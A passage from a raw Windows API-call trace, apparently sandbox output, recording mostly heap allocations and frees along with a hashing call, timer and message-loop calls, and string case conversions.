dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0131.923] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0131.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0131.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0131.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0131.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0131.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0131.923] CryptHashData (hHash=0xa87110, pbData=0x2e54d58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0131.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0131.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0131.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0131.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0131.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0131.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0131.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0132.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0132.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0132.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0132.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0132.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0132.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0132.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0132.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0132.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0132.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0132.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0132.171] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0132.171] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0132.171] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0132.172] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0132.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0132.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0132.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0132.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0132.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0132.173] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0132.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0132.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0132.174] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0132.174] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0132.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0132.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0132.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0132.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0132.177] 